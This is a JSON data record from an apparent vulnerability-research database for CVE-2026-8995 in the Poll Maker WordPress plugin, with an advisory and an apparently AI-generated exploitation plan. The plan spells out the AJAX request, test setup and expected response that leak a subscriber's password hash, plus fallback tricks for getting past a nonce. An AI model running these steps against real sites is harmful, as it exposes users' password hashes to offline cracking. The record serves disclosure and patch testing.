[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-cV4YrE25zkzWxZBMff_WXG4p24uua5YE2Yz_HmCyuk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-8995","poll-maker-by-ays-authenticated-subscriber-sensitive-information-exposure-in-ayspollgetuserinformation-ajax-action","Poll Maker by AYS \u003C= 6.3.7 - Authenticated (Subscriber+) Sensitive Information Exposure in 'ays_poll_get_user_information' AJAX Action","The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to and including 6.3.7. This is due to insufficient access controls on the 'ays_poll_get_user_information' AJAX action, which serializes and returns the complete WP_User object — including the user_pass (bcrypt password hash), user_email, user_login, user_registered, roles, and all capabilities — without any nonce verification or capability check beyond is_user_logged_in(). This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve sensitive account data including their own password hash, which WordPress does not expose through any of its standard interfaces and which can be leveraged for offline password-cracking attacks.","poll-maker",null,"\u003C=6.3.7","6.3.8","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-05-28 13:39:45","2026-05-29 02:27:46",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5d1ff79e-5246-422a-ae75-20763e7acd17?source=api-prod",1,[22,23,24,25,26,27,28],"README.txt","admin\u002Fclass-poll-maker-ays-admin.php","includes\u002Fclass-poll-maker-custom-post-type.php","poll-maker-ays.php","public\u002Fclass-poll-maker-ays-public.php","public\u002Fjs\u002Fpoll-maker-public-ajax.js","uninstall.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-8995\n\n## 1. Vulnerability Summary\nThe **Poll Maker by AYS** plugin (versions \u003C= 6.3.7) contains a sensitive information exposure vulnerability in its `ays_poll_get_user_information` AJAX action. The vulnerability exists because the handler for this action fails to implement any capability checks beyond verifying if the user is logged in (`is_user_logged_in()`). When invoked, the handler serializes and returns the entire `WP_User` object for the currently authenticated user. This object includes the `user_pass` (bcrypt password hash), `user_email`, `user_login`, and all capabilities, allowing any authenticated user (starting from the Subscriber role) to retrieve their own password hash for offline cracking.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ays_poll_get_user_information`\n- **HTTP Method:** `POST` (though `GET` might work depending on how the hook is registered)\n- **Parameters:**\n    - `action`: `ays_poll_get_user_information`\n- **Authentication:** Authenticated. Any user role (Subscriber, Contributor, etc.) can exploit this.\n- **Preconditions:** The user must have a valid session cookie.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers the AJAX action. Based on `public\u002Fjs\u002Fpoll-maker-public-ajax.js` (line 69), the JavaScript triggers a request to the action `ays_poll_get_user_information`.\n2. **Registration (Inferred):** In `includes\u002Fclass-poll-maker-ays.php` (or similar registration class), the plugin likely defines:\n   ```php\n   add_action('wp_ajax_ays_poll_get_user_information', array($this, 'ays_poll_get_user_information'));\n   ```\n3. **Handler Logic:** The handler function (likely located in `admin\u002Fclass-poll-maker-ays-admin.php` or `includes\u002Fclass-poll-maker-ays-functions.php`) behaves as follows:\n   - Checks `is_user_logged_in()`.\n   - Retrieves the current user using `wp_get_current_user()`.\n   - Sends the object back using `wp_send_json_success($user)`.\n4. **Vulnerable Sink:** The `wp_send_json_success()` function serializes the `WP_User` object. In WordPress, the `WP_User` object contains a `data` property that explicitly holds the `user_pass` field from the database.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description and the provided source `public\u002Fjs\u002Fpoll-maker-public-ajax.js`:\n- **Nonce Requirement:** The AJAX call in the plugin's own JS does **not** include a nonce parameter.\n- **Verification:** \n    ```javascript\n    \u002F\u002F public\u002Fjs\u002Fpoll-maker-public-ajax.js line 72\n    var userData = {};\n    userData.action = 'ays_poll_get_user_information';\n    $.ajax({\n        url: poll_maker_ajax_public.ajax_url,\n        method: 'post',\n        dataType: 'json',\n        data: userData,\n        \u002F\u002F ...\n    });\n    ```\nThe absence of a nonce in the official AJAX request indicates that the server-side handler does not call `check_ajax_referer()` or `wp_verify_nonce()`. Therefore, **no nonce is required** to exploit this vulnerability.\n\n## 5. Exploitation Strategy\nThe goal is to retrieve the current user's sensitive data, specifically the password hash.\n\n1. **Step 1: Authenticate as Subscriber**\n   Use the `http_request` tool to log in to the WordPress instance as a Subscriber-level user.\n\n2. **Step 2: Trigger Vulnerable Action**\n   Send a `POST` request to the AJAX endpoint.\n\n   - **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers:**\n     - `Content-Type: application\u002Fx-www-form-urlencoded`\n     - `Cookie: [Subscriber Session Cookies]`\n   - **Body:**\n     ```\n     action=ays_poll_get_user_information\n     ```\n\n3. **Step 3: Parse Response**\n   The response will be a JSON object. We expect to find the `user_pass` field within the `data` segment of the response.\n\n## 6. Test Data Setup\n1. **Create Subscriber User:**\n   ```bash\n   wp user create victim victim@example.com --role=subscriber --user_pass=P@ssword123!\n   ```\n2. **Ensure Plugin is Active:**\n   ```bash\n   wp plugin activate poll-maker\n   ```\n\n## 7. Expected Results\nA successful exploit will return a `200 OK` response with a JSON body similar to:\n```json\n{\n  \"success\": true,\n  \"data\": {\n    \"data\": {\n      \"ID\": \"2\",\n      \"user_login\": \"victim\",\n      \"user_pass\": \"$P$B9V...\", \n      \"user_nicename\": \"victim\",\n      \"user_email\": \"victim@example.com\",\n      \"user_url\": \"\",\n      \"user_registered\": \"2023-10-27 10:00:00\",\n      \"user_activation_key\": \"\",\n      \"user_status\": \"0\",\n      \"display_name\": \"victim\"\n    },\n    \"ID\": 2,\n    \"caps\": {\n      \"subscriber\": true\n    },\n    \"roles\": [\n      \"subscriber\"\n    ]\n  }\n}\n```\nThe presence of the `user_pass` field (the bcrypt hash) confirms the vulnerability.\n\n## 8. Verification Steps\n1. **Confirm via CLI:**\n   Retrieve the actual password hash from the database using `wp-cli` to compare it with the leaked hash.\n   ```bash\n   wp db query \"SELECT user_pass FROM wp_users WHERE user_login='victim'\"\n   ```\n2. **Comparison:**\n   Verify that the value returned by the AJAX request matches the hash stored in the database.\n\n## 9. Alternative Approaches\nIf the plugin has been partially patched or uses a different handler name:\n- **Action Discovery:** Search for other occurrences of `ays_poll_` in the `admin-ajax.php` hooks if `ays_poll_get_user_information` is missing.\n- **Parameter Variation:** Try sending the request via `GET` instead of `POST`.\n- **Shortcode Extraction:** If a nonce *is* actually required in certain configurations (e.g. Pro version or hidden settings), use the `ays_poll` shortcode to force script loading:\n    1. `wp post create --post_type=page --post_status=publish --post_content=\"[ays_poll id='1']\"`\n    2. Navigate to the page.\n    3. Use `browser_eval(\"window.poll_maker_ajax_public\")` to inspect all available localized variables.","gemini-3-flash-preview","2026-06-04 15:47:09","2026-06-04 15:47:35",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","6.3.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpoll-maker\u002Ftags\u002F6.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpoll-maker.6.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpoll-maker\u002Ftags\u002F6.3.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpoll-maker.6.3.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpoll-maker\u002Ftags"]